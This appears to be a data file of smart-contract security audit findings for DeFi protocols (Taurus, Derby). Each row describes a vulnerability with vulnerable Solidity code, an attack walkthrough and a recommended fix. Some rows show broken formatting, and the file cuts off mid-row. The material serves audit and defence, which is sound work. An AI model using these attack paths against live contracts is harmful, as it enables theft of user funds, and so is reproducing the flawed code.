external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n\\n // Check that collateral received is sufficient for liquidator\\n uint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n if (collateralToLiquidator < (_debtAmount * _minExchangeRate) / Constants.PRECISION) {\\n revert insufficientCollateralLiquidated(_debtAmount, collateralToLiquidator);\\n }\\n\\n // Update user info\\n userDetails[_account].collateral = accDetails.collateral - collateralToLiquidate;\\n userDetails[_account].debt = accDetails.debt - _debtAmount;\\n\\n // Burn liquidator's Tau\\n TAU(tau).burnFrom(msg.sender, _debtAmount);\\n\\n // Transfer part of _debtAmount to liquidator and Taurus as fees for liquidation\\n IERC20(collateralToken).safeTransfer(msg.sender, collateralToLiquidator);\\n IERC20(collateralToken).safeTransfer(\\n Controller(controller).addressMapper(Constants.FEE_SPLITTER),\\n liquidationSurcharge\\n );\\n\\n emit AccountLiquidated(msg.sender, _account, collateralToLiquidate, liquidationSurcharge);\\n\\n return true;\\n }\\n```\\n",update of price oracle should be restricted with a `timelock`.,A malicious admin can steal all users collateral,```\\n2. Multisig. Trusted with essentially everything but user collateral. \\n```\\n +User can prevent liquidations by frontrunning the tx and slightly increasing their collateral,medium,"User can prevent liquidations by frontrunning the tx and decreasing their debt so that the liquidation transaction reverts.\\nIn the liquidation transaction, the caller has to specify the amount of debt they want to liquidate, `_debtAmount`. The maximum value for that parameter is the total amount of debt the user holds:\\n```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n\\nIn `_calcLiquidation()`, the contract determines how much collateral to liquidate when `_debtAmount` is paid by the caller. In that function, there's a check that reverts if the caller tries to liquidate more than they are allowed to depending on the position's health.\\n```\\n function _calcLiquidation(\\n uint256 _accountCollateral,\\n uint256 _accountDebt,\\n uint256 _debtToLiquidate\\n ) internal view returns (uint256 collateralToLiquidate, uint256 liquidationSurcharge) {\\n // // rest of code \\n \\n // Revert if requested liquidation amount is greater than allowed\\n if (\\n _debtToLiquidate >\\n _getMaxLiquidation(_accountCollateral, _accountDebt, price, decimals, totalLiquidationDiscount)\\n ) revert wrongLiquidationAmount();\\n```\\n\\nThe goal is to get that if-clause to evaluate to `true` so that the transaction reverts. To modify your position's health you have two possibilities: either you increase your collateral or decrease your debt. So instead of preventing the liquidation by pushing your position to a healthy state, you only modify it slightly so that the caller's liquidation transaction reverts.\\nGiven that Alice has:\\n100 TAU debt\\n100 Collateral (price = $1 so that collateralization rate is 1) Her position can be liquidated. The max value is:\\n```\\n function _getMaxLiquidation(\\n uint256 _collateral,\\n uint256 _debt,\\n uint256 _price,\\n uint8 _decimals,\\n uint256 _liquidationDiscount\\n ) internal pure returns (uint256 maxRepay) {\\n // Formula to find the liquidation amount is as follows\\n // [(collateral * price) - (liqDiscount * liqAmount)] / (debt - liqAmount) = max liq ratio\\n // Therefore\\n // liqAmount = [(max liq ratio * debt) - (collateral * price)] / (max liq ratio - liqDiscount)\\n maxRepay =\\n ((MAX_LIQ_COLL_RATIO * _debt) - ((_collateral * _price * Constants.PRECISION) / (10 ** _decimals))) /\\n (MAX_LIQ_COLL_RATIO - _liquidationDiscount);\\n\\n // Liquidators cannot repay more than the account's debt\\n if (maxRepay > _debt) {\\n maxRepay = _debt;\\n }\\n\\n return maxRepay;\\n }\\n```\\n\\n$(1.3e18 * 100e18 - (100e18 * 1e18 * 1e18) / 1e18) / 1.3e18 = 23.07e18$ (leave out liquidation discount for easier math)\\nThe liquidator will probably use the maximum amount they can liquidate and call `liquidate()` with `23.07e18`. Alice frontruns the liquidator's transaction and increases the collateral by `1`. That will change the max liquidation amount to: $(1.3e18 * 100e18 - 101e18 * 1e18) / 1.3e18 = 22.3e18$.\\nThat will cause `_calcLiquidation()` to revert because `23.07e18 > 22.3e18`.\\nThe actual amount of collateral to add or debt to decrease depends on the liquidation transaction. But, generally, you would expect the liquidator to liquidate as much as possible. Thus, you only have to slightly move the position to cause their transaction to revert","In `_calcLiquidation()` the function shouldn't revert if _debtToLiqudiate > `_getMaxLiquidation()`. Instead, just continue with the value `_getMaxLiquidation()` returns.",User can prevent liquidations by slightly modifying their position without putting it at a healthy state.,"```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n" +"Cross-chain message authentication can be bypassed, allowing an attacker to disrupt the state of vaults",high,"A malicious actor may send a cross-chain message to an `XProvider` contract and bypass the `onlySource` authentication check. As a result, they'll be able to call any function in the `XProvider` contract that has the `onlySource` modifier and disrupt the state of `XChainController` and all vaults.\\nThe protocol integrates with Connext to handle cross-chain interactions. `XProvider` is a contract that manages interactions between vaults deployed on all supported networks and `XChainController`. `XProvider` is deployed on each of the network where a vault is deployed and is used to send and receive cross-chain messages via Connext. `XProvider` is a core contract that handles vault rebalancing, transferring of allocations from Game to `XChainController` and to vaults, transferring of tokens deposited to vaults between vault on different networks. Thus, it's critical that the functions of this contract are only called by authorized actors.\\nTo ensure that cross-chain messages are sent from authorized actors, there's onlySource modifier that's applied to the xReceive function. The modifier checks that the sender of a message is trusted:\\n```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n}\\n```\\n\\nHowever, it doesn't check that `trustedRemoteConnext[_origin]` is set (i.e. it's not the zero address), and `_originSender` can in fact be the zero address.\\nIn Connext, a message can be delivered via one of the two paths: the fast path or the slow path. The fast path is taken when, on the destination, message receiving is not authentication, i.e. when destination allows receiving of messages from all senders. The slow path is taken when message receiving on the destination is authenticated, i.e. destination allows any sender (it doesn't check a sender).\\nSince, `XProvider` always checks the sender of a message, only the slow path will be used by Connext to deliver messages to it. However, Connext always tries the slow path:\\nRouters observing the origin chain with funds on the destination chain will: Simulate the transaction (if this fails, the assumption is that this is a more ""expressive"" crosschain message that requires authentication and so must go through the AMB: the slow path).\\nI.e. it'll always send a message and see if it reverts on the destination or not: if it does, Connext will switch to the slow path.\\nWhen Connext executes a message on the destination chain in the fast path, it sets the sender address to the zero address:\\n```\\n(bool success, bytes memory returnData) = ExcessivelySafeCall.excessivelySafeCall(\\n _params.to,\\n gasleft() - Constants.EXECUTE_CALLDATA_RESERVE_GAS,\\n 0, // native asset value (always 0)\\n Constants.DEFAULT_COPY_BYTES, // only copy 256 bytes back as calldata\\n abi.encodeWithSelector(\\n IXReceiver.xReceive.selector,\\n _transferId,\\n _amount,\\n _asset,\\n _reconciled ? _params.originSender : address(0), // use passed in value iff authenticated\\n _params.originDomain,\\n _params.callData\\n )\\n);\\n```\\n\\nThus, Connext will try to call the `XProvider.xReceive` function with the `_originSender` argument set to the zero address. And there are situations when the `onlySource` modifier will pass such calls: when the origin network (as specified by the `_origin` argument) is not in the `trustedRemoteConnext` mapping.\\nAccording to the description of the project, it'll be deployed on the following networks:\\nMainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain\\nAnd this is the list of networks supported by Connext:\\nEthereum Mainnet Polygon Optimism Arbitrum One Gnosis Chain BNB Chain\\nThus, a malicious actor can send a message from Gnosis Chain (it's not supported by Derby), and the `onlySource` modifier will pass the message. The same is true for any new network supported by Connext in the future and not supported by Derby.","In the `onlySource` modifier, consider checking that `trustedRemoteConnext[_origin]` doesn't return the zero address:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\nindex 6074fa0..f508a7c 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n@@ // Remove the line below\\n83,7 // Add the line below\\n83,7 @@ contract XProvider is IXReceiver {\\n * 3) The call to this contract comes from Connext.\\n */\\n modifier onlySource(address _originSender, uint32 _origin) {\\n// Remove the line below\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n// Add the line below\\n require(trustedRemoteConnext[_origin] != address(0) && _originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n }\\n```\\n","A malicious actor can call `XProvider.xReceive` and any functions of `XProvider` with the `onlySelf` modifier:\\nxReceive allow the caller to call any public function of `XProvider`, but only the ones with the `onlySelf` modifier are authorized;\\nreceiveAllocations can be used to corrupt allocations in the `XChainController` (i.e. allocate all tokens only to the protocol the attacker will benefit the most from);\\nreceiveTotalUnderlying can be used to set wrong ""total underlying"" value in the `XChainController` and block rebalancing of vaults (due to an underflow or another arithmetical error);\\nreceiveSetXChainAllocation can be used to set an exchange rate that will allow an attacker to drain a vault by redeeming their LP tokens at a higher rate;\\nreceiveFeedbackToXController can be used to trick the `XChainController` into skipping receiving of funds from a vault;\\nreceiveProtocolAllocationsToVault can be used by an attacker to unilaterally set allocations in a vault, directing funds only to protocol the attacker will benefit from;\\nreceiveRewardsToGame can be used by an attacker to increase the reward per LP token in a protocol the attacker deposited to;\\nfinally, receiveStateFeedbackToVault can allow an attacker to switch off a vault and exclude it from rebalancing.","```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n}\\n```\\n" +Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.,high,"Certain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes("""") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.",Provide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.,"An attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.","```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n" +maxTrainingDeposit can be bypassed,medium,"It was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`",If user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\n,User can bypass maxTrainingDeposit and deposit more than allowed,"```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n" +MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds,medium,"MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.",You need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.,Reserved funds protection can be broken,"```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n" +Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next period,medium,"Game doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.","First of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.",Player looses all his rewards,"```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n" +Vault.blacklistProtocol can revert in emergency,medium,"Vault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.","Provide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(""vault"", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(""vault"", true) and tries to withdraw",Hacked or paused protocol can't be set to blacklist.,"```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n" +The protocol could not handle multiple vaults correctly,medium,"The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), ""No rebalance needed"");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`",Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array,The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values,```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n +"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price",medium,"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.","In case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.",User's rewards calculation is unpredictable.,"```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n" +Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic,medium,"`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), ""Protocol on 